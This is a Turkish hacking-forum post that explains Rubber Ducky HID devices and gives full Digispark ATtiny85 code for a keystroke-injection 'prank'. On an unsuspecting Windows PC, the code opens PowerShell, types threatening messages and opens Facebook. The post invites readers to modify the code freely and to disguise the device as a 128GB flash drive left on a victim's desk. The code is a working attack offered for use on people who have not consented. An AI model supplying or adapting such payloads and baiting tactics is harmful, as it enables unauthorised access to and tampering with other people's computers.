Rubber Ducky Saldırısı |USB ile bilgisayar hackleme|

'CaptainKanka

O Şimdi Asker!
14 Eki 2012
1,683
1,257
localhost/admin.php
Rubber Ducky

Hak5 ekibi tarafından oluşturulan bir USB’dir aslında. Fakat USB gibi çalışmaz. Rubber Ducky bir HID( Human Interface Device) cihazıdır. İnsan cihaz arayüzleri, klavye, mouse, joystick gibi cihazlardır. Bu cihazlar bilgisayara usb yolu ile bağlandığı zaman bilgisayar tarafından güvenlik duvarına takılmazlar. Yani sistem tarafından güvenilir kabul edilir ve kontrol edilmezler. Diğer USB girişler ise bilgisayar tarafından kontrol edilir. Bu USB kodlandıktan sonra bilgisayarınız tarafından bir HID olarak algılanır. Bu yüzden sorgulanmaz. Sorgulanmaması sebebiyle, eğer içinde zararlı yazılımlar var ise bu yazılımlar bilgisayarınıza zarar verebilir veya hackleyebilir. Bu yüzden bilmediğiniz USB’leri bilgisayarınıza takmamanızı tavsiye ederiz.

Biz bu yazımızda şaka amaçlı hazırladığımız USB’den bahsedeceğiz. Sizler de arkadaşlarınıza şakaları yapabilirsiniz.


Digispark Attiny85

Hem USB girişine sahip olması hem de küçük olması sebebiyle Yapımında Digispark Attiny85 usb’li modülü kullanmayı tercih ettik. Digispark Attiny85 Modül Kurulumu ve Kod yükleme aşamaları için turuncu yazımıza tıklayabilirsiniz. Orada detaylı anlatım mevcut.

Yazımızdaki kuruluma ek olarak bir de Türkçe klavye desteği kurmamız gerekiyor. Buradaki zip dosyasını indirerek, o yazımızdaki kütüphane kurulumu adımlarına benzer bir şekilde kütüphane kurulumunu gerçekleştirebilirsiniz. (DigisparkKeyboard-master)

Hack Şakası Kodları



#define kbd_tr_tr​
#include "DigiKeyboard.h"​
void setup() {​
DigiKeyboard.delay(200);​
DigiKeyboard.sendKeyStroke(0);​
}​
void loop() {​
int i = 1;​
DigiKeyboard.sendKeyStroke(0);​
DigiKeyboard.sendKeyStroke(KEY_D, MOD_GUI_LEFT); // Masaüstü açılır​
DigiKeyboard.delay(600);​
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // Windows çalıştırma paneli​
DigiKeyboard.delay(600);​
DigiKeyboard.print("powershell"); //powersell i açar​
DigiKeyboard.sendKeyStroke(KEY_ENTER);​
DigiKeyboard.delay(600);​
DigiKeyboard.print("$client = new-object System.Net.WebClient");​
DigiKeyboard.sendKeyStroke(KEY_ENTER);​
DigiKeyboard.delay(600);​
DigiKeyboard.print("BU EKRANI SAKIN KAPATMA!!!!");​
DigiKeyboard.delay(600);​
DigiKeyboard.sendKeyStroke(KEY_ENTER);​
DigiKeyboard.delay(600);​
DigiKeyboard.print("kayan kırmızı yazılardan korktuğunu biliyorum:):)):");​
DigiKeyboard.sendKeyStroke(KEY_ENTER);​
DigiKeyboard.delay(600);​
DigiKeyboard.print("bilgisayarını kaybediyorsun:):)):");​
DigiKeyboard.sendKeyStroke(KEY_ENTER);​
DigiKeyboard.delay(600);​
DigiKeyboard.print("exit");​
DigiKeyboard.sendKeyStroke(KEY_ENTER);​
DigiKeyboard.sendKeyStroke​
(KEY_R, MOD_GUI_LEFT);​
DigiKeyboard.delay(600);​
DigiKeyboard.print("It's just a PRANK bro!");​
DigiKeyboard.sendKeyStroke(KEY_ENTER);​
DigiKeyboard.delay(800);​
DigiKeyboard.sendKeyStroke(KEY_F11);​
DigiKeyboard.delay(1000);​
DigiKeyboard.sendKeyStroke(KEY_F11);​
DigiKeyboard.delay(600);​
while(i==1){ // Enter your chosen case here​
DigiKeyboard.sendKeyStroke​
(KEY_R, MOD_GUI_LEFT);​
DigiKeyboard.delay(600);​
DigiKeyboard.print("www.facebook.com");​
DigiKeyboard.sendKeyStroke(KEY_ENTER);​
DigiKeyboard.delay(4000);​
DigiKeyboard.print("p");​
DigiKeyboard.delay(600);​
DigiKeyboard.print("HAHAH KORKTUN MU?");​
DigiKeyboard.sendKeyStroke(KEY_ENTER);​
DigiKeyboard.delay(4000);​
DigiKeyboard.sendKeyStroke​
(KEY_ENTER, MOD_CONTROL_RIGHT);​
i = 2;​
delay(8000);​
}​
}​


Burada verilen kodları değiştirerek istediğinizi yapabilirsiniz. Örneğin rubberduckynizi 128gblik usb bellek haline getirerek(Dışını kaplayarak) hacklemek istediğiniz kişinin masasına koyunuz. Zaten merak edecektir ve cebe atacaktır( Atıyorlar :) ) artık kurban ellerinizde.
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.